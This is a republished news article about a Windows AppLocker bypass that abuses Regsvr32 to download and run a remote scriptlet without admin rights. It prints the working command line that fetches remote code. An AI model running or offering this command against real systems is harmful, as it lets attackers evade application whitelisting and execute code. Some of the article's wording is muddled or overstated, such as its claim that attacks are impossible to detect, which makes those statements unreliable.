Windows AppLocker Bypass Allows Attackers to Registers DLLs Off the Internet

KNOWLEDGE BELONGS TO THE WORLD
Share on FacebookTweet about this on TwitterShare on LinkedInShare on RedditShare on Google+Share on TumblrPin on PinterestDigg this

No admin privileges are required to run the attack. Clever hackers can bypass Microsoft’s Windows AppLocker security feature by abusing a hidden trait of the Regsvr32 command-line utility that’s normally used to register DLLs on a Windows computer.

AppLocker is a security feature introduced with Windows 7 and Windows Server 2008 R2 that helps administrators specify which users or group of users are allowed to access and run files on a per-file basis.

Regsvr32 is a scripting utility that can be used by installers or in batch scripts to quickly register a DLL. As you’d imagine, Microsoft has neutered such a dangerous tool in order to prevent abuses by allowing administrator privileges to run.

Attacks are impossible to detect

According to security researcher Casey Smith, an attacker that has a foothold on an infected Windows workstation can abuse Regsvr32 to download a COM scriptlet (.sct file) off the Internet and run it to register a DLL on the local machine.

windows-applocker-bypass-allows-attackers-to-registers-dlls-off-the-internet

The attacker won’t need admin privileges, Regsvr32 is proxy aware, can work with TLS content, follows redirects, and above all, signed by a Microsoft-issued certificate, making all commands look like normal Windows background activity.

Below are the standard Regsvr32 syntax and a version of a malicious command:

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Regsvr32 feature is not documented

“It’s not well documented that regsvr32.exe can accept a url for a script,” Smith also noted. “In order to trigger this bypass, place the code block, either VB or JS inside the element.”

For further tests, the researcher has also published four proof-of-concept scripts on GitHub that sysadmins can load via Regsvr32 and open a backdoor or a reverse shell over HTTP.

In theory, these kinds of exploits would allow a hacker access to registers DLLS and then execute malicious code on the compromised machines, even with admin privileges.

Source:http://news.softpedia.com/

(Visited 144 times, 1 visits today)
KNOWLEDGE BELONGS TO THE WORLD
Share on FacebookTweet about this on TwitterShare on LinkedInShare on RedditShare on Google+Share on TumblrPin on PinterestDigg this